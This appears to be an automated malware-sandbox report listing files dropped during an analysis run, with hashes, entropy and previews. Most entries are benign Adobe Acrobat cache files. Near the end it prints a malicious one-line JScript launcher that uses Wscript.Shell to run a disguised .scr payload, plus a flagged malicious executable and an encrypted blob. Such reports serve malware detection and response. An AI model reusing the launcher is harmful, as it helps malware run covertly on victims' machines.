                                      Preview:{"analyticsData":{"responseGUID":"eedbaeb3-d340-4286-96b0-ed7bb0271688","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1736239324469,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                      File Type:JSON data
                                      Category:dropped
                                      Size (bytes):285
                                      Entropy (8bit):5.325225443562671
                                      Encrypted:false
                                      SSDEEP:6:YEQXJ2HX1SzIRfe2nmSg1c2LjcWkHvR0Y0DoAvJfPmwrPeUkwRe9:YvXKX12Oe2mT5LjIPIsGH56Ukee9
                                      MD5:19C30EA9D6A5B8CA8CF6B586F3CBE13B
                                      SHA1:BC57EF6AF72508F3D71A57E47A662433260FB156
                                      SHA-256:433478D26B84EE0BE181F37FA8C41C5C05A89D871068CAFEF63DB467BC1CC131
                                      SHA-512:AE4EA692048A26CB472634BA96B114EFD25A9B4493C9FDFA2536D333DB729A47A20CC321802656D31D379EBA1CB9DDF4AB990B4A8C19631E413BA1F9F20C020A
                                      Malicious:false
                                      Preview:{"analyticsData":{"responseGUID":"eedbaeb3-d340-4286-96b0-ed7bb0271688","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1736239324469,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                      File Type:JSON data
                                      Category:dropped
                                      Size (bytes):1123
                                      Entropy (8bit):5.6884757201
                                      Encrypted:false
                                      SSDEEP:24:Yv6X1F7mT5XIQJpLgE9cQx8LennAvzBvkn0RCmK8czOCCSrQD:YvedeXbJhgy6SAFv5Ah8cv/rk
                                      MD5:B36544F6FAAED76DC81C1F774BD99F36
                                      SHA1:F0493DF8397D1C58806F1A2C23258D69E71BA813
                                      SHA-256:13B6EC2F8B6E3E6DFE92A47B280DC2C94A83A79281E07A9532BBDA225546AECE
                                      SHA-512:158C4FF1CD8AF512DC44946DE03A31543D7B06D2FE0136D83D9253FE60851F629D08C7F71002B27BC84709201C3FA1367017DE066B611B49DF51D25B7960EDDF
                                      Malicious:false
                                      Preview:{"analyticsData":{"responseGUID":"eedbaeb3-d340-4286-96b0-ed7bb0271688","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1736239324469,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                      File Type:JSON data
                                      Category:dropped
                                      Size (bytes):289
                                      Entropy (8bit):5.295249436440619
                                      Encrypted:false
                                      SSDEEP:6:YEQXJ2HX1SzIRfe2nmSg1c2LjcWkHvR0Y0DoAvJf8dPeUkwRe9:YvXKX12Oe2mT5LjIPIsGU8Ukee9
                                      MD5:0901418CA03F705708EDBAFFBE01F9E4
                                      SHA1:2B2CC10F09369202C7D88DEED3AAF6650B162B03
                                      SHA-256:A096992922E9C667011436F680DF56DAB0179B47603CECF1ED805ADD36BF28E5
                                      SHA-512:322730E6E8FD023C98E1EDD1D37664E93648FD524EB69020162E8029DB2311DB9EAB883055BFDBCB03F8FBC81C5A159EB19A9F5773C3DA201AB8E7255ACB9D80
                                      Malicious:false
                                      Preview:{"analyticsData":{"responseGUID":"eedbaeb3-d340-4286-96b0-ed7bb0271688","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1736239324469,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                      File Type:JSON data
                                      Category:dropped
                                      Size (bytes):292
                                      Entropy (8bit):5.285993313719903
                                      Encrypted:false
                                      SSDEEP:6:YEQXJ2HX1SzIRfe2nmSg1c2LjcWkHvR0Y0DoAvJfQ1rPeUkwRe9:YvXKX12Oe2mT5LjIPIsGY16Ukee9
                                      MD5:4F25F0996EF9692CCA325F1B1395829E
                                      SHA1:22EF3A3B5C65F9B29F034F5D2F14459FD37790B4
                                      SHA-256:1F4027212FF4A67B56704A2A2278C0C9D3F9D2AFB5A28C3B0DDCDF726271D940
                                      SHA-512:1B525DA31B884AA7D00B520FAEE28FBBCF025EE2CABB7B082B5BDC0E07A43C11912F666A3F849311AB05CB5AE9907D001D163293C798B4E60DFA1780D4805855
                                      Malicious:false
                                      Preview:{"analyticsData":{"responseGUID":"eedbaeb3-d340-4286-96b0-ed7bb0271688","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1736239324469,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                      File Type:JSON data
                                      Category:dropped
                                      Size (bytes):289
                                      Entropy (8bit):5.301590125025259
                                      Encrypted:false
                                      SSDEEP:6:YEQXJ2HX1SzIRfe2nmSg1c2LjcWkHvR0Y0DoAvJfFldPeUkwRe9:YvXKX12Oe2mT5LjIPIsGz8Ukee9
                                      MD5:4FC7019CFC4BB743AE343201E2175EDD
                                      SHA1:1DA5C7D25D265C254D4251824323CF1B9C46B459
                                      SHA-256:DC1B4A27543E66E2360A5E6FD9760E51D654BB2B1294919B5D614C23AEC5EC42
                                      SHA-512:D7481BF3FF2C81867965F1DA0065521C95E18209F346E4C9ECADA09A46E105D14EF084F25F3613A9B18DAE25BC6D3B5FC28F0560A273F62E206DD315439C9E32
                                      Malicious:false
                                      Preview:{"analyticsData":{"responseGUID":"eedbaeb3-d340-4286-96b0-ed7bb0271688","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1736239324469,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                      File Type:JSON data
                                      Category:dropped
                                      Size (bytes):295
                                      Entropy (8bit):5.320202229145316
                                      Encrypted:false
                                      SSDEEP:6:YEQXJ2HX1SzIRfe2nmSg1c2LjcWkHvR0Y0DoAvJfzdPeUkwRe9:YvXKX12Oe2mT5LjIPIsGb8Ukee9
                                      MD5:C4E6FA16745CC9A902159E8E3527D7B2
                                      SHA1:AE7B1AD8113BD454B36F7AA42AB726C6DCE292DF
                                      SHA-256:ACDC6B6C8385A73D529ABC7A1AAD555C76EDA6425AB0CBDF1D001A7239CAF686
                                      SHA-512:0AF4455D4AD534E5E8FF14E69F04BEB6007EE85003C5F92E0D1E55D62446BB013DEC6C9E40DB896A4C2EE7FDD4EA8439C6838FC04C62F4740EC0DAD4EF57AFD5
                                      Malicious:false
                                      Preview:{"analyticsData":{"responseGUID":"eedbaeb3-d340-4286-96b0-ed7bb0271688","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1736239324469,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                      File Type:JSON data
                                      Category:dropped
                                      Size (bytes):289
                                      Entropy (8bit):5.300569564396201
                                      Encrypted:false
                                      SSDEEP:6:YEQXJ2HX1SzIRfe2nmSg1c2LjcWkHvR0Y0DoAvJfYdPeUkwRe9:YvXKX12Oe2mT5LjIPIsGg8Ukee9
                                      MD5:B3F92290285025976EFD6B624E05384C
                                      SHA1:1B3788C9C698DA2254B9B5A6A161F37297216F32
                                      SHA-256:70C3346C2B0BDF88A00452DFD0C1C2B2F6809AAF7143240F98213496BCC8DD19
                                      SHA-512:0AD51CD8E50B351894483C15213FE024BC60A43C742B35CF9FD60600CF4139E540A9614413E5103A2AE38CE24160F6FDD35E24630B62661B0E1E7FF31B67448A
                                      Malicious:false
                                      Preview:{"analyticsData":{"responseGUID":"eedbaeb3-d340-4286-96b0-ed7bb0271688","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1736239324469,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                      File Type:JSON data
                                      Category:dropped
                                      Size (bytes):284
                                      Entropy (8bit):5.287478805750921
                                      Encrypted:false
                                      SSDEEP:6:YEQXJ2HX1SzIRfe2nmSg1c2LjcWkHvR0Y0DoAvJf+dPeUkwRe9:YvXKX12Oe2mT5LjIPIsG28Ukee9
                                      MD5:E41293BAB27B3BB45E7FE15FED1707DF
                                      SHA1:BE09002D7A62C88964B77896069513F0B3214C93
                                      SHA-256:CBC57F11243D6B852BE7C596A9397FDB95B2EEBB11D5EAD187203E3DC947CE54
                                      SHA-512:29A4DDC7BC99DFECDF77349A47F4045C8CD4716FA67DC95620583834AC40AB6AFB7A558AD542A08A35E514575F915634643BAD2566385AAFCE4614094F0E45C3
                                      Malicious:false
                                      Preview:{"analyticsData":{"responseGUID":"eedbaeb3-d340-4286-96b0-ed7bb0271688","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1736239324469,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                      File Type:JSON data
                                      Category:dropped
                                      Size (bytes):291
                                      Entropy (8bit):5.284112747538132
                                      Encrypted:false
                                      SSDEEP:6:YEQXJ2HX1SzIRfe2nmSg1c2LjcWkHvR0Y0DoAvJfbPtdPeUkwRe9:YvXKX12Oe2mT5LjIPIsGDV8Ukee9
                                      MD5:240B33DED0E32D5A45643DFCD4584561
                                      SHA1:DDD85C4E9C64D1029ED49021996AF9737E309465
                                      SHA-256:6EC7F90332CBC1FE0F1DB5C17D4A930BB9491DB7D6D59F3529A6A0F884B9FA3F
                                      SHA-512:4661FD4DD46B1F805DF839646DF3E90B438B4816FBC0611A94C97734D948DF9421E123F78189012BF0B50E96EEB5A11C27781C732B57478BE024F19D5F817CDE
                                      Malicious:false
                                      Preview:{"analyticsData":{"responseGUID":"eedbaeb3-d340-4286-96b0-ed7bb0271688","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1736239324469,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                      File Type:JSON data
                                      Category:dropped
                                      Size (bytes):287
                                      Entropy (8bit):5.275880558674834
                                      Encrypted:false
                                      SSDEEP:6:YEQXJ2HX1SzIRfe2nmSg1c2LjcWkHvR0Y0DoAvJf21rPeUkwRe9:YvXKX12Oe2mT5LjIPIsG+16Ukee9
                                      MD5:F6D3A525CB10837DD472605B6CAE5999
                                      SHA1:98550959741150CC80A4C16872CDFA6D09C6C856
                                      SHA-256:4DEE94ED1462389091FA1112905578235FFD2C943DDC4A26D841C49D87BD3AFE
                                      SHA-512:FF6451F13DAE2843B42A8B3748786960C9B053DC2211B6A1B9224F253EB3B1EE5847B23F2353F7E203CD8FE17F15534C32B82613872D18CC347FCC333CF00DC8
                                      Malicious:false
                                      Preview:{"analyticsData":{"responseGUID":"eedbaeb3-d340-4286-96b0-ed7bb0271688","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1736239324469,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                      File Type:JSON data
                                      Category:dropped
                                      Size (bytes):1090
                                      Entropy (8bit):5.663414382698624
                                      Encrypted:false
                                      SSDEEP:24:Yv6X1F7mT5XIQ5amXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSrQD:YvedeXbFBgkDMUJUAh8cvMrk
                                      MD5:FB38AB8D4C2CE5C0439F245F4A483E1B
                                      SHA1:0E5D0582222FB0E0C3D4C84AAE943244D3216A3D
                                      SHA-256:40EFB035964CF46BA79D187A2FCABDA09A0CC4A0D186C3CDA4F2474CB9EA8AA3
                                      SHA-512:F66B9B67034D633140CAB61AC8F77E0F0941582E73857829457B8C62BBF6FECBCF62536C1B8497F8501D32ED674F79A2FA52BD9812668B58A8EBB6F31E2E11D2
                                      Malicious:false
                                      Preview:{"analyticsData":{"responseGUID":"eedbaeb3-d340-4286-96b0-ed7bb0271688","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1736239324469,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                      File Type:JSON data
                                      Category:dropped
                                      Size (bytes):286
                                      Entropy (8bit):5.249635270968422
                                      Encrypted:false
                                      SSDEEP:6:YEQXJ2HX1SzIRfe2nmSg1c2LjcWkHvR0Y0DoAvJfshHHrPeUkwRe9:YvXKX12Oe2mT5LjIPIsGUUUkee9
                                      MD5:2E5C4392A42A7041D291CDFC571B5411
                                      SHA1:B2E7C8D85D855D7DC89360E798B817C6E8DA8321
                                      SHA-256:13470A2263573B38A899E7AF1245681E5CF812848FB0DD8BA83E372039093AA9
                                      SHA-512:B6DA77449529206A977E9A2CE41712F04254B4F1D2F5AB828FF736EED64835A1B9486D2D5CEDD2F14E4CF28B3EA8202CF66DF0E7A0BC8B796E76F3F51209D1F0
                                      Malicious:false
                                      Preview:{"analyticsData":{"responseGUID":"eedbaeb3-d340-4286-96b0-ed7bb0271688","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1736239324469,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                      File Type:JSON data
                                      Category:dropped
                                      Size (bytes):282
                                      Entropy (8bit):5.255031713390615
                                      Encrypted:false
                                      SSDEEP:6:YEQXJ2HX1SzIRfe2nmSg1c2LjcWkHvR0Y0DoAvJTqgFCrPeUkwRe9:YvXKX12Oe2mT5LjIPIsGTq16Ukee9
                                      MD5:481D4EA7C79E4EC09FEFA2F2A8300228
                                      SHA1:042A93452EFBAA1B23F7AB444C8C4F8BEF9CB59B
                                      SHA-256:284655E7A1B1801CCD53F0CEBC21E0C873802CF519E7A5CDD5E4D40F066367B7
                                      SHA-512:B0F57D20CCD9807F8C346B1E904CEBCCCCAE4FFD25C65C734C49225D3681FC3DABA9D4B37E3B563C6DC9ED7C4B92426612994FAFFE945A3A3A3DD85429A20A58
                                      Malicious:false
                                      Preview:{"analyticsData":{"responseGUID":"eedbaeb3-d340-4286-96b0-ed7bb0271688","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1736239324469,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):4
                                      Entropy (8bit):0.8112781244591328
                                      Encrypted:false
                                      SSDEEP:3:e:e
                                      MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                      SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                      SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                      SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                      Malicious:false
                                      Preview:....
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                      File Type:JSON data
                                      Category:dropped
                                      Size (bytes):2814
                                      Entropy (8bit):5.137235612540642
                                      Encrypted:false
                                      SSDEEP:48:YULhm70qBJpj/1kVruBH7cEtR08mMjN9J:fQBHb1kVQJt6X+zJ
                                      MD5:D5DC16CC77EB44A383ED677DF7481C4D
                                      SHA1:BAA466859EF61D721699EC7837B7179D9A1CC51C
                                      SHA-256:7975BA883DF7D77C5551D23CDCCAF1E785CD497329D05124A60D4F5E7CE66A98
                                      SHA-512:714C1E43EAFFB02B004692CA7484BED2AB2910D4339B7F2A02A76FCE3BF2551DB069189776EF0D30BDDB6A5276B8AA94A7B626A04571155349FB2BA9CBA21A54
                                      Malicious:false
                                      Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"5fbabf12d34f91d24c6980d09d35ba17","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1736063779000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"de68783b204a39eecef548146520c788","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1736063778000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"062744e561ee5c97036e30913d53e572","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1736063778000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"9e19fc6a0b40696e2c3ed0c708504868","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1736063778000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"00f6a7b661cf6b31c651b23fcee5be6f","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1736063778000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"b81b6920696d24968b58be7ed7a8b5c2","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 26, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 26
                                      Category:dropped
                                      Size (bytes):12288
                                      Entropy (8bit):1.3671572026873418
                                      Encrypted:false
                                      SSDEEP:24:TLBx/XYKQvGJF7urs9S6bqyKn6ylSTofcNqDuKECG0XKdqEKfS8EKfM1baCECG0F:Tll2GL7msMcKTlS8fcsuKECofICECx
                                      MD5:8F7D800198E0D507C4D431C6AACE0825
                                      SHA1:41B4976CCAEE81A5C9C1AEEC41B36FEBFD1F4EE9
                                      SHA-256:18A4EDC7981559B425D3D6D23C8539659F259FE7420007374421B9B738197AEE
                                      SHA-512:C997897D9E6452F35BFE15684CA3B47F73F5584D8349C7907FDE0CBF2B739B73A182C6E627723B9F14DCC50BC73D9D35ACA64D169F70D88AB9678967C6FCCDB3
                                      Malicious:false
                                      Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                      File Type:SQLite Rollback Journal
                                      Category:dropped
                                      Size (bytes):8720
                                      Entropy (8bit):1.8405052579789023
                                      Encrypted:false
                                      SSDEEP:24:7+tt4Z6bqyKn6ylSTofcNqDuKECG0+KdqEKfS8EKfM1banbqgqLKufx/XYKQvGJw:7MMcKTlS8fcsuKECpfIdqGufl2GL7msO
                                      MD5:412783B3CBA236FBB2CE8078F019FCF2
                                      SHA1:2DFD4F54743E535CFA3CC35EE37F31556CDBA15D
                                      SHA-256:2C7873565627394999161D76AEA1B43120F146C8218F5F9C80EE64BFA7DB6719
                                      SHA-512:5E78830C7D9E2255FE5E997AB8287D409B89B6A9113208BFF1FDC8EF6454D1ACB026D6E7E05584CD619E8DAEA41F2D9711E028F59421A3A95C630BB61F422B83
                                      Malicious:false
                                      Preview:.... .c.....tS............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................^..^.^.^.^.^.^.^.-.-.-.-.-.-.-.-.-.-.-........................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):66726
                                      Entropy (8bit):5.392739213842091
                                      Encrypted:false
                                      SSDEEP:768:RNOpblrU6TBH44ADKZEgAAjWKL/A+q9LbP+amin8PNYyu:6a6TZ44ADEAAyKsr9LNYNK
                                      MD5:91E2C889E4B964F06D3AA9EE02CB54C9
                                      SHA1:82D4F3808E8A32A3FC7DDC79013F89EF967584FC
                                      SHA-256:05496921BA77A73367998223CC73EA592ACE160835F20C581FB925F50F845C36
                                      SHA-512:6AF314E56C6E4B4AF17AD37230511ABEBAD1002A2C4322D923CBE04D362B8B1133CBB278E3308A81882F4E9E65C0CDED5A72F67B6B8EB9DEBD68BD133D9158CA
                                      Malicious:false
                                      Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                      Process:C:\Users\user\AppData\Local\Temp\677826\Prostores.com
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):192
                                      Entropy (8bit):4.726418798538641
                                      Encrypted:false
                                      SSDEEP:3:RiMIpGXIdPHo55wWAX+PKMEkD5o+jYaLitqL9WiZo5uWAX+PKMEkD5o+jYaLid5M:RiJBJHonwWDMkDvNLMqL9WiywWDMkDv7
                                      MD5:E0A807436E6A9F8201FB7ECBDFBC4F62
                                      SHA1:99732D579469BDFB31538AD7615BF03D2123FA91
                                      SHA-256:1C5DECDC95CAD7C16DD48BACC244BCE717FD02DC78E296F38012F7832656AA57
                                      SHA-512:C4AB96C0C4AD356F317441654C6919B18654E2D95EBB63B7A3192AFEC1033BC660B88C20C97F47E194AAD00C6C324A55AC7755646BC049ED4E232C44E1C8CAB8
                                      Malicious:true
                                      Preview:new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\MediaFusion Technologies Inc\\CineBlend.scr\" \"C:\\Users\\user\\AppData\\Local\\MediaFusion Technologies Inc\\s\"")
                                      Process:C:\Users\user\AppData\Local\Temp\677826\Prostores.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):947288
                                      Entropy (8bit):6.630612696399572
                                      Encrypted:false
                                      SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                      MD5:62D09F076E6E0240548C2F837536A46A
                                      SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                      SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                      SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Joe Sandbox View:
                                      • Filename: c2.hta, Detection: malicious, Browse
                                      • Filename: c2.hta, Detection: malicious, Browse
                                      • Filename: RisingStrip.exe, Detection: malicious, Browse
                                      • Filename: Active_Setup.exe, Detection: malicious, Browse
                                      • Filename: CenteredDealing.exe, Detection: malicious, Browse
                                      • Filename: CenteredDealing.exe, Detection: malicious, Browse
                                      • Filename: over.ps1, Detection: malicious, Browse
                                      • Filename: MatAugust.exe, Detection: malicious, Browse
                                      • Filename: 6684V5n83w.exe, Detection: malicious, Browse
                                      • Filename: vlid_acid.exe, Detection: malicious, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\677826\Prostores.com
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):733484
                                      Entropy (8bit):7.999727303580045
                                      Encrypted:true
                                      SSDEEP:12288:7EjETXeEPYtANOcxShg6LO5mrcPIez2EsXwEA0cIYJU9YoULsEpW2bhhbaIkJflE:7EE9Iln+6LcmoPIezgAv0JioULJpph93
                                      MD5:C82D57C04AAD2BD54DFEED7CBFEE8ECB
                                      SHA1:C564CFCA3BCC3A26128917C94AB4E44F9CD25BBE
                                      SHA-256:4E285732BD17A06AE4BE71BEAAD8E5CE4DBD211F2888B4571D5D0C716764C767
                                      SHA-512:9D3102EFB33D4B5A510D24D1B7F313C66CB502B6B7572EF2C10538D3B48B8D63D7CAD41E5B9596181B142A7FDFD27727C6541A55307B4C4F793B957ACD7ECEDB
                                      Malicious:false
